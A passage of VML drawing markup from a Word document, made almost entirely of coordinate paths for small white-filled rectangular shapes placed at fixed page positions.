,4932,2231,4934,2231,4935,2231,4937,2231,4939,2231,4940,2231,4942,2231,4944,2231,4946,2231,4948,2231,4949,2231,4951,2231,4954,2231,4956,2231,4958,2231,4960,2231,4962,2231,4965,2231,4967,2231,4970,2231,4972,2231,4975,2231,4977,2231,4980,2231,4983,2231,4986,2231,4989,2231,4992,2231,4995,2231,4998,2231,5001,2231,5005,2231,5008,2231,5011,2231,5015,2231,5018,2231,5022,2231,5026,2231,5030,2231,5033,2231,5037,2231,5041,2231,5046,2231,5050,2231,5054,2231,5058,2231,5063,2231,5067,2231,5072,2231,5077,2231,5082,2231,5086,2231,5091,2231,5096,2231,5102,2231,5107,2231,5112,2231,5118,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2231,5123,2230,5123,2230,5123,2230,5123,2230,5123,2230,5123,2230,5123,2230,5123,2229,5123,2229,5123,2229,5123,2229,5123,2229,5123,2228,5123,2228,5123,2228,5123,2227,5123,2227,5123,2227,5123,2227,5123,2226,5123,2226,5123,2225,5123,2225,5123,2225,5123,2224,5123,2224,5123,2223,5123,2223,5123,2222,5123,2222,5123,2221,5123,2221,5123,2220,5123,2219,5123,2219,5123,2218,5123,2217,5123,2217,5123,2216,5123,2215,5123,2214,5123,2214,5123,2213,5123,2212,5123,2211,5123,2210,5123,2209,5123,2208,5123,2207,5123,2206,5123,2205,5123,2204,5123,2203,5123,2202,5123,2201,5123,2200,5123,2199,5123,2197,5123,2196,5123,2195,5123,2194,5123,2192,5123,2191,5123,2189,5123,2188,5123,2187,5123,2185,5123,2183,5123,2182,5123,2180,5123,2179,5123,2177,5123,2175,5123,2173,5123,2172,5123,2170,5123,2168,5123,2166,5123,2164,5123,2162,5123,2160,5123,2158,5123,2156,5123,2154,5123,2152,5123,2149,5123,2147,5123,2145,5123,2143,5123,2140,5123,2138,5123,2135,5123,2133,5123,2130,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5123,2128,5122,2128,5122,2128,5122,2128,5122,2128,5122,2128,5122,2128,5122,2128,5121,2128,5121,2128,5121,2128,5121,2128,5120,2128,5120,2128,5120,2128,5119,2128,5119,2128,5118,2128,5118,2128,5118,2128,5117,2128,5116,2128,5116,2128,5115,2128,5115,2128,5114,2128,5113,2128,5113,2128,5112,2128,5111,2128,5110,2128,5110,2128,5109,2128,5108,2128,5107,2128,5106,2128,5105,2128,5104,2128,5103,2128,5101,2128,5100,2128,5099,2128,5098,2128,5096,2128,5095,2128,5093,2128,5092,2128,5090,2128,5089,2128,5087,2128,5086,2128,5084,2128,5082,2128,5080,2128,5078,2128,5076,2128,5074,2128,5072,2128,5070,2128,5068,2128,5066,2128,5063,2128,5061,2128,5059,2128,5056,2128,5054,2128,5051,2128,5048,2128,5046,2128,5043,2128,5040,2128,5037,2128,5034,2128,5031,2128,5028,2128,5025,2128,5021,2128,5018,2128,5014,2128,5011,2128,5007,2128,5004,2128,5000,2128,4996,2128,4992,2128,4988,2128,4984,2128,4980,2128,4976,2128,4972,2128,4967,2128,4963,2128,4958,2128,4954,2128,4949,2128,4944,2128,4939,2128,4934,2128,4929,2128,4924,2128,4919,2128,4914,2128,4908,2128,4903e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:244.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,4890" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:4890;width:110;height:230" coordorigin="2530,4890" coordsize="110,230" path="m2543,4903l2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2543,4903,2544,4903,2544,4903,2544,4903,2544,4903,2544,4903,2544,4903,2544,4903,2545,4903,2545,4903,2545,4903,2545,4903,2545,4903,2546,4903,2546,4903,2546,4903,2547,4903,2547,4903,2547,4903,2548,4903,2548,4903,2548,4903,2549,4903,2549,4903,2549,4903,2550,4903,2550,4903,2551,4903,2551,4903,2552,4903,2552,4903,2553,4903,2553,4903,2554,4903,2555,4903,2555,4903,2556,4903,2557,4903,2557,4903,2558,4903,2559,4903,2560,4903,2560,4903,2561,4903,2562,4903,2563,4903,2564,4903,2565,4903,2566,4903,2567,4903,2568,4903,2569,4903,2570,4903,2571,4903,2572,4903,2573,4903,2574,4903,2575,4903,2577,4903,2578,4903,2579,4903,2580,4903,2582,4903,2583,4903,2585,4903,2586,4903,2587,4903,2589,4903,2591,4903,2592,4903,2594,4903,2595,4903,2597,4903,2599,4903,2601,4903,2602,4903,2604,4903,2606,4903,2608,4903,2610,4903,2612,4903,2614,4903,2616,4903,2618,4903,2620,4903,2622,4903,2625,4903,2627,4903,2629,4903,2631,4903,2634,4903,2636,4903,2639,4903,2641,4903,2644,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4903,2646,4904,2646,4904,2646,4904,2646,4904,2646,4904,2646,4904,2646,4905,2646,4905,2646,4905,2646,4906,2646,4906,2646,4906,2646,4907,2646,4907,2646,4907,2646,4908,2646,4908,2646,4909,2646,4909,2646,4910,2646,4910,2646,4911,2646,4912,2646,4912,2646,4913,2646,4914,2646,4915,2646,4915,2646,4916,2646,4917,2646,4918,2646,4919,2646,4920,2646,4921,2646,4922,2646,4923,2646,4924,2646,4926,2646,4927,2646,4928,2646,4930,2646,4931,2646,4932,2646,4934,2646,4935,2646,4937,2646,4939,2646,4940,2646,4942,2646,4944,2646,4946,2646,4948,2646,4949,2646,4951,2646,4954,2646,4956,2646,4958,2646,4960,2646,4962,2646,4965,2646,4967,2646,4970,2646,4972,2646,4975,2646,4977,2646,4980,2646,4983,2646,4986,2646,4989,2646,4992,2646,4995,2646,4998,2646,5001,2646,5005,2646,5008,2646,5011,2646,5015,2646,5018,2646,5022,2646,5026,2646,5030,2646,5033,2646,5037,2646,5041,2646,5046,2646,5050,2646,5054,2646,5058,2646,5063,2646,5067,2646,5072,2646,5077,2646,5082,2646,5086,2646,5091,2646,5096,2646,5102,2646,5107,2646,5112,2646,5118,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2646,5123,2645,5123,2645,5123,2645,5123,2645,5123,2645,5123,2645,5123,2645,5123,2644,5123,2644,5123,2644,5123,2644,5123,2643,5123,2643,5123,2643,5123,2643,5123,2642,5123,2642,5123,2642,5123,2641,5123,2641,5123,2641,5123,2640,5123,2640,5123,2640,5123,2639,5123,2639,5123,2638,5123,2638,5123,2637,5123,2637,5123,2636,5123,2636,5123,2635,5123,2634,5123,2634,5123,2633,5123,2632,5123,2632,5123,2631,5123,2630,5123,2629,5123,2629,5123,2628,5123,2627,5123,2626,5123,2625,5123,2624,5123,2623,5123,2622,5123,2621,5123,2620,5123,2619,5123,2618,5123,2617,5123,2616,5123,2615,5123,2614,5123,2612,5123,2611,5123,2610,5123,2609,5123,2607,5123,2606,5123,2604,5123,2603,5123,2601,5123,2600,5123,2598,5123,2597,5123,2595,5123,2594,5123,2592,5123,2590,5123,2588,5123,2587,5123,2585,5123,2583,5123,2581,5123,2579,5123,2577,5123,2575,5123,2573,5123,2571,5123,2569,5123,2567,5123,2564,5123,2562,5123,2560,5123,2558,5123,2555,5123,2553,5123,2550,5123,2548,5123,2545,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5123,2543,5122,2543,5122,2543,5122,2543,5122,2543,5122,2543,5122,2543,5122,2543,5121,2543,5121,2543,5121,2543,5121,2543,5120,2543,5120,2543,5120,2543,5119,2543,5119,2543,5118,2543,5118,2543,5118,2543,5117,2543,5116,2543,5116,2543,5115,2543,5115,2543,5114,2543,5113,2543,5113,2543,5112,2543,5111,2543,5110,2543,5110,2543,5109,2543,5108,2543,5107,2543,5106,2543,5105,2543,5104,2543,5103,2543,5101,2543,5100,2543,5099,2543,5098,2543,5096,2543,5095,2543,5093,2543,5092,2543,5090,2543,5089,2543,5087,2543,5086,2543,5084,2543,5082,2543,5080,2543,5078,2543,5076,2543,5074,2543,5072,2543,5070,2543,5068,2543,5066,2543,5063,2543,5061,2543,5059,2543,5056,2543,5054,2543,5051,2543,5048,2543,5046,2543,5043,2543,5040,2543,5037,2543,5034,2543,5031,2543,5028,2543,5025,2543,5021,2543,5018,2543,5014,2543,5011,2543,5007,2543,5004,2543,5000,2543,4996,2543,4992,2543,4988,2543,4984,2543,4980,2543,4976,2543,4972,2543,4967,2543,4963,2543,4958,2543,4954,2543,4949,2543,4944,2543,4939,2543,4934,2543,4929,2543,4924,2543,4919,2543,4914,2543,4908,2543,4903e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:271.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,5430" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:5430;width:110;height:230" coordorigin="2110,5430" coordsize="110,230" path="m2128,5447l2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2128,5447,2129,5447,2129,5447,2129,5447,2129,5447,2129,5447,2129,5447,2129,5447,2129,5447,2130,5447,2130,5447,2130,5447,2130,5447,2131,5447,2131,5447,2131,5447,2131,5447,2132,5447,2132,5447,2132,5447,2133,5447,2133,5447,2133,5447,2134,5447,2134,5447,2134,5447,2135,5447,2135,5447,2136,5447,2136,5447,2137,5447,2137,5447,2138,5447,2138,5447,2139,5447,2140,5447,2140,5447,2141,5447,2142,5447,2142,5447,2143,5447,2144,5447,2145,5447,2145,5447,2146,5447,2147,5447,2148,5447,2149,5447,2150,5447,2151,5447,2152,5447,2153,5447,2154,5447,2155,5447,2156,5447,2157,5447,2158,5447,2159,5447,2160,5447,2162,5447,2163,5447,2164,5447,2165,5447,2167,5447,2168,5447,2170,5447,2171,5447,2173,5447,2174,5447,2176,5447,2177,5447,2179,5447,2180,5447,2182,5447,2184,5447,2186,5447,2187,5447,2189,5447,2191,5447,2193,5447,2195,5447,2197,5447,2199,5447,2201,5447,2203,5447,2205,5447,2207,5447,2210,5447,2212,5447,2214,5447,2216,5447,2219,5447,2221,5447,2224,5447,2226,5447,2229,5447,2231,5447,2231,5447,2231,5447,2231,5447,2231,5447,2231,5447,2231,5447,2231,5447,2231,5447,2231,5447,2231,5447,2231,5447,2231,5447,2231,5448,2231,5448,2231,5448,2231,5448,2231,5448,2231,5448,2231,5448,2231,5448,2231,5448,2231,5449,2231,5449,2231,5449,2231,5449,2231,5449,2231,5450,2231,5450,2231,5450,2231,5450,2231,5451,2231,5451,2231,5452,2231,5452,2231,5452,2231,5453,2231,5453,2231,5454,2231,5454,2231,5455,2231,5456,2231,5456,2231,5457,2231,5458,2231,5458,2231,5459,2231,5460,2231,5461,2231,5462,2231,5463,2231,5464,2231,5465,2231,5466,2231,5467,2231,5468,2231,5469,2231,5470,2231,5472,2231,5473,2231,5474,2231,5476,2231,5477,2231,5478,2231,5480,2231,5482,2231,5483,2231,5485,2231,5487,2231,5488,2231,5490,2231,5492,2231,5494,2231,5496,2231,5498,2231,5500,2231,5502,2231,5505,2231,5507,2231,5509,2231,5512,2231,5514,2231,5517,2231,5519,2231,5522,2231,5525,2231,5528,2231,5530,2231,5533,2231,5536,2231,5540,2231,5543,2231,5546,2231,5549,2231,5553,2231,5556,2231,5559,2231,5563,2231,5567,2231,5570,2231,5574,2231,5578,2231,5582,2231,5586,2231,5590,2231,5594,2231,5599,2231,5603,2231,5608,2231,5612,2231,5617,2231,5621,2231,5626,2231,5631,2231,5636,2231,5641,2231,5646,2231,5651,2231,5657,2231,5662,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2231,5668,2230,5668,2230,5668,2230,5668,2230,5668,2230,5668,2230,5668,2230,5668,2229,5668,2229,5668,2229,5668,2229,5668,2229,5668,2228,5668,2228,5668,2228,5668,2227,5668,2227,5668,2227,5668,2227,5668,2226,5668,2226,5668,2225,5668,2225,5668,2225,5668,2224,5668,2224,5668,2223,5668,2223,5668,2222,5668,2222,5668,2221,5668,2221,5668,2220,5668,2219,5668,2219,5668,2218,5668,2217,5668,2217,5668,2216,5668,2215,5668,2214,5668,2214,5668,2213,5668,2212,5668,2211,5668,2210,5668,2209,5668,2208,5668,2207,5668,2206,5668,2205,5668,2204,5668,2203,5668,2202,5668,2201,5668,2200,5668,2199,5668,2197,5668,2196,5668,2195,5668,2194,5668,2192,5668,2191,5668,2189,5668,2188,5668,2187,5668,2185,5668,2183,5668,2182,5668,2180,5668,2179,5668,2177,5668,2175,5668,2173,5668,2172,5668,2170,5668,2168,5668,2166,5668,2164,5668,2162,5668,2160,5668,2158,5668,2156,5668,2154,5668,2152,5668,2149,5668,2147,5668,2145,5668,2143,5668,2140,5668,2138,5668,2135,5668,2133,5668,2130,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5668,2128,5667,2128,5667,2128,5667,2128,5667,2128,5667,2128,5667,2128,5667,2128,5667,2128,5667,2128,5666,2128,5666,2128,5666,2128,5666,2128,5665,2128,5665,2128,5665,2128,5665,2128,5664,2128,5664,2128,5663,2128,5663,2128,5663,2128,5662,2128,5662,2128,5661,2128,5661,2128,5660,2128,5659,2128,5659,2128,5658,2128,5657,2128,5657,2128,5656,2128,5655,2128,5654,2128,5653,2128,5652,2128,5651,2128,5650,2128,5649,2128,5648,2128,5647,2128,5646,2128,5645,2128,5644,2128,5642,2128,5641,2128,5639,2128,5638,2128,5637,2128,5635,2128,5633,2128,5632,2128,5630,2128,5628,2128,5627,2128,5625,2128,5623,2128,5621,2128,5619,2128,5617,2128,5615,2128,5613,2128,5610,2128,5608,2128,5606,2128,5603,2128,5601,2128,5598,2128,5596,2128,5593,2128,5590,2128,5587,2128,5585,2128,5582,2128,5579,2128,5576,2128,5572,2128,5569,2128,5566,2128,5563,2128,5559,2128,5556,2128,5552,2128,5548,2128,5545,2128,5541,2128,5537,2128,5533,2128,5529,2128,5525,2128,5521,2128,5516,2128,5512,2128,5507,2128,5503,2128,5498,2128,5494,2128,5489,2128,5484,2128,5479,2128,5474,2128,5469,2128,5464,2128,5458,2128,5453,2128,5447e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:271.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,5430" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:5430;width:110;height:230" coordorigin="2530,5430" coordsize="110,230" path="m2543,5447l2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2543,5447,2544,5447,2544,5447,2544,5447,2544,5447,2544,5447,2544,5447,2544,5447,2545,5447,2545,5447,2545,5447,2545,5447,2545,5447,2546,5447,2546,5447,2546,5447,2547,5447,2547,5447,2547,5447,2548,5447,2548,5447,2548,5447,2549,5447,2549,5447,2549,5447,2550,5447,2550,5447,2551,5447,2551,5447,2552,5447,2552,5447,2553,5447,2553,5447,2554,5447,2555,5447,2555,5447,2556,5447,2557,5447,2557,5447,2558,5447,2559,5447,2560,5447,2560,5447,2561,5447,2562,5447,2563,5447,2564,5447,2565,5447,2566,5447,2567,5447,2568,5447,2569,5447,2570,5447,2571,5447,2572,5447,2573,5447,2574,5447,2575,5447,2577,5447,2578,5447,2579,5447,2580,5447,2582,5447,2583,5447,2585,5447,2586,5447,2587,5447,2589,5447,2591,5447,2592,5447,2594,5447,2595,5447,2597,5447,2599,5447,2601,5447,2602,5447,2604,5447,2606,5447,2608,5447,2610,5447,2612,5447,2614,5447,2616,5447,2618,5447,2620,5447,2622,5447,2625,5447,2627,5447,2629,5447,2631,5447,2634,5447,2636,5447,2639,5447,2641,5447,2644,5447,2646,5447,2646,5447,2646,5447,2646,5447,2646,5447,2646,5447,2646,5447,2646,5447,2646,5447,2646,5447,2646,5447,2646,5447,2646,5447,2646,5448,2646,5448,2646,5448,2646,5448,2646,5448,2646,5448,2646,5448,2646,5448,2646,5448,2646,5449,2646,5449,2646,5449,2646,5449,2646,5449,2646,5450,2646,5450,2646,5450,2646,5450,2646,5451,2646,5451,2646,5452,2646,5452,2646,5452,2646,5453,2646,5453,2646,5454,2646,5454,2646,5455,2646,5456,2646,5456,2646,5457,2646,5458,2646,5458,2646,5459,2646,5460,2646,5461,2646,5462,2646,5463,2646,5464,2646,5465,2646,5466,2646,5467,2646,5468,2646,5469,2646,5470,2646,5472,2646,5473,2646,5474,2646,5476,2646,5477,2646,5478,2646,5480,2646,5482,2646,5483,2646,5485,2646,5487,2646,5488,2646,5490,2646,5492,2646,5494,2646,5496,2646,5498,2646,5500,2646,5502,2646,5505,2646,5507,2646,5509,2646,5512,2646,5514,2646,5517,2646,5519,2646,5522,2646,5525,2646,5528,2646,5530,2646,5533,2646,5536,2646,5540,2646,5543,2646,5546,2646,5549,2646,5553,2646,5556,2646,5559,2646,5563,2646,5567,2646,5570,2646,5574,2646,5578,2646,5582,2646,5586,2646,5590,2646,5594,2646,5599,2646,5603,2646,5608,2646,5612,2646,5617,2646,5621,2646,5626,2646,5631,2646,5636,2646,5641,2646,5646,2646,5651,2646,5657,2646,5662,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2646,5668,2645,5668,2645,5668,2645,5668,2645,5668,2645,5668,2645,5668,2645,5668,2644,5668,2644,5668,2644,5668,2644,5668,2643,5668,2643,5668,2643,5668,2643,5668,2642,5668,2642,5668,2642,5668,2641,5668,2641,5668,2641,5668,2640,5668,2640,5668,2640,5668,2639,5668,2639,5668,2638,5668,2638,5668,2637,5668,2637,5668,2636,5668,2636,5668,2635,5668,2634,5668,2634,5668,2633,5668,2632,5668,2632,5668,2631,5668,2630,5668,2629,5668,2629,5668,2628,5668,2627,5668,2626,5668,2625,5668,2624,5668,2623,5668,2622,5668,2621,5668,2620,5668,2619,5668,2618,5668,2617,5668,2616,5668,2615,5668,2614,5668,2612,5668,2611,5668,2610,5668,2609,5668,2607,5668,2606,5668,2604,5668,2603,5668,2601,5668,2600,5668,2598,5668,2597,5668,2595,5668,2594,5668,2592,5668,2590,5668,2588,5668,2587,5668,2585,5668,2583,5668,2581,5668,2579,5668,2577,5668,2575,5668,2573,5668,2571,5668,2569,5668,2567,5668,2564,5668,2562,5668,2560,5668,2558,5668,2555,5668,2553,5668,2550,5668,2548,5668,2545,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5668,2543,5667,2543,5667,2543,5667,2543,5667,2543,5667,2543,5667,2543,5667,2543,5667,2543,5667,2543,5666,2543,5666,2543,5666,2543,5666,2543,5665,2543,5665,2543,5665,2543,5665,2543,5664,2543,5664,2543,5663,2543,5663,2543,5663,2543,5662,2543,5662,2543,5661,2543,5661,2543,5660,2543,5659,2543,5659,2543,5658,2543,5657,2543,5657,2543,5656,2543,5655,2543,5654,2543,5653,2543,5652,2543,5651,2543,5650,2543,5649,2543,5648,2543,5647,2543,5646,2543,5645,2543,5644,2543,5642,2543,5641,2543,5639,2543,5638,2543,5637,2543,5635,2543,5633,2543,5632,2543,5630,2543,5628,2543,5627,2543,5625,2543,5623,2543,5621,2543,5619,2543,5617,2543,5615,2543,5613,2543,5610,2543,5608,2543,5606,2543,5603,2543,5601,2543,5598,2543,5596,2543,5593,2543,5590,2543,5587,2543,5585,2543,5582,2543,5579,2543,5576,2543,5572,2543,5569,2543,5566,2543,5563,2543,5559,2543,5556,2543,5552,2543,5548,2543,5545,2543,5541,2543,5537,2543,5533,2543,5529,2543,5525,2543,5521,2543,5516,2543,5512,2543,5507,2543,5503,2543,5498,2543,5494,2543,5489,2543,5484,2543,5479,2543,5474,2543,5469,2543,5464,2543,5458,2543,5453,2543,5447e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:299.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,5990" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:5990;width:110;height:230" coordorigin="2110,5990" coordsize="110,230" path="m2128,6005l2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2128,6005,2129,6005,2129,6005,2129,6005,2129,6005,2129,6005,2129,6005,2129,6005,2129,6005,2130,6005,2130,6005,2130,6005,2130,6005,2131,6005,2131,6005,2131,6005,2131,6005,2132,6005,2132,6005,2132,6005,2133,6005,2133,6005,2133,6005,2134,6005,2134,6005,2134,6005,2135,6005,2135,6005,2136,6005,2136,6005,2137,6005,2137,6005,2138,6005,2138,6005,2139,6005,2140,6005,2140,6005,2141,6005,2142,6005,2142,6005,2143,6005,2144,6005,2145,6005,2145,6005,2146,6005,2147,6005,2148,6005,2149,6005,2150,6005,2151,6005,2152,6005,2153,6005,2154,6005,2155,6005,2156,6005,2157,6005,2158,6005,2159,6005,2160,6005,2162,6005,2163,6005,2164,6005,2165,6005,2167,6005,2168,6005,2170,6005,2171,6005,2173,6005,2174,6005,2176,6005,2177,6005,2179,6005,2180,6005,2182,6005,2184,6005,2186,6005,2187,6005,2189,6005,2191,6005,2193,6005,2195,6005,2197,6005,2199,6005,2201,6005,2203,6005,2205,6005,2207,6005,2210,6005,2212,6005,2214,6005,2216,6005,2219,6005,2221,6005,2224,6005,2226,6005,2229,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6005,2231,6006,2231,6006,2231,6006,2231,6006,2231,6006,2231,6006,2231,6006,2231,6007,2231,6007,2231,6007,2231,6007,2231,6008,2231,6008,2231,6008,2231,6009,2231,6009,2231,6010,2231,6010,2231,6010,2231,6011,2231,6012,2231,6012,2231,6013,2231,6013,2231,6014,2231,6015,2231,6015,2231,6016,2231,6017,2231,6018,2231,6018,2231,6019,2231,6020,2231,6021,2231,6022,2231,6023,2231,6024,2231,6025,2231,6027,2231,6028,2231,6029,2231,6030,2231,6032,2231,6033,2231,6035,2231,6036,2231,6038,2231,6039,2231,6041,2231,6042,2231,6044,2231,6046,2231,6048,2231,6050,2231,6052,2231,6054,2231,6056,2231,6058,2231,6060,2231,6062,2231,6065,2231,6067,2231,6069,2231,6072,2231,6074,2231,6077,2231,6080,2231,6082,2231,6085,2231,6088,2231,6091,2231,6094,2231,6097,2231,6100,2231,6103,2231,6107,2231,6110,2231,6114,2231,6117,2231,6121,2231,6124,2231,6128,2231,6132,2231,6136,2231,6140,2231,6144,2231,6148,2231,6152,2231,6156,2231,6161,2231,6165,2231,6170,2231,6174,2231,6179,2231,6184,2231,6189,2231,6194,2231,6199,2231,6204,2231,6209,2231,6214,2231,6220,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2231,6225,2230,6225,2230,6225,2230,6225,2230,6225,2230,6225,2230,6225,2230,6225,2229,6225,2229,6225,2229,6225,2229,6225,2229,6225,2228,6225,2228,6225,2228,6225,2227,6225,2227,6225,2227,6225,2227,6225,2226,6225,2226,6225,2225,6225,2225,6225,2225,6225,2224,6225,2224,6225,2223,6225,2223,6225,2222,6225,2222,6225,2221,6225,2221,6225,2220,6225,2219,6225,2219,6225,2218,6225,2217,6225,2217,6225,2216,6225,2215,6225,2214,6225,2214,6225,2213,6225,2212,6225,2211,6225,2210,6225,2209,6225,2208,6225,2207,6225,2206,6225,2205,6225,2204,6225,2203,6225,2202,6225,2201,6225,2200,6225,2199,6225,2197,6225,2196,6225,2195,6225,2194,6225,2192,6225,2191,6225,2189,6225,2188,6225,2187,6225,2185,6225,2183,6225,2182,6225,2180,6225,2179,6225,2177,6225,2175,6225,2173,6225,2172,6225,2170,6225,2168,6225,2166,6225,2164,6225,2162,6225,2160,6225,2158,6225,2156,6225,2154,6225,2152,6225,2149,6225,2147,6225,2145,6225,2143,6225,2140,6225,2138,6225,2135,6225,2133,6225,2130,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6225,2128,6224,2128,6224,2128,6224,2128,6224,2128,6224,2128,6224,2128,6223,2128,6223,2128,6223,2128,6222,2128,6222,2128,6222,2128,6221,2128,6221,2128,6221,2128,6220,2128,6220,2128,6219,2128,6219,2128,6218,2128,6218,2128,6217,2128,6216,2128,6216,2128,6215,2128,6214,2128,6213,2128,6213,2128,6212,2128,6211,2128,6210,2128,6209,2128,6208,2128,6207,2128,6206,2128,6205,2128,6204,2128,6202,2128,6201,2128,6200,2128,6198,2128,6197,2128,6196,2128,6194,2128,6193,2128,6191,2128,6189,2128,6188,2128,6186,2128,6184,2128,6182,2128,6180,2128,6179,2128,6177,2128,6174,2128,6172,2128,6170,2128,6168,2128,6166,2128,6163,2128,6161,2128,6158,2128,6156,2128,6153,2128,6151,2128,6148,2128,6145,2128,6142,2128,6139,2128,6136,2128,6133,2128,6130,2128,6127,2128,6123,2128,6120,2128,6117,2128,6113,2128,6110,2128,6106,2128,6102,2128,6098,2128,6095,2128,6091,2128,6087,2128,6082,2128,6078,2128,6074,2128,6070,2128,6065,2128,6061,2128,6056,2128,6051,2128,6046,2128,6042,2128,6037,2128,6032,2128,6026,2128,6021,2128,6016,2128,6010,2128,6005e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:299.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,5990" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:5990;width:110;height:230" coordorigin="2530,5990" coordsize="110,230" path="m2543,6005l2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2543,6005,2544,6005,2544,6005,2544,6005,2544,6005,2544,6005,2544,6005,2544,6005,2545,6005,2545,6005,2545,6005,2545,6005,2545,6005,2546,6005,2546,6005,2546,6005,2547,6005,2547,6005,2547,6005,2548,6005,2548,6005,2548,6005,2549,6005,2549,6005,2549,6005,2550,6005,2550,6005,2551,6005,2551,6005,2552,6005,2552,6005,2553,6005,2553,6005,2554,6005,2555,6005,2555,6005,2556,6005,2557,6005,2557,6005,2558,6005,2559,6005,2560,6005,2560,6005,2561,6005,2562,6005,2563,6005,2564,6005,2565,6005,2566,6005,2567,6005,2568,6005,2569,6005,2570,6005,2571,6005,2572,6005,2573,6005,2574,6005,2575,6005,2577,6005,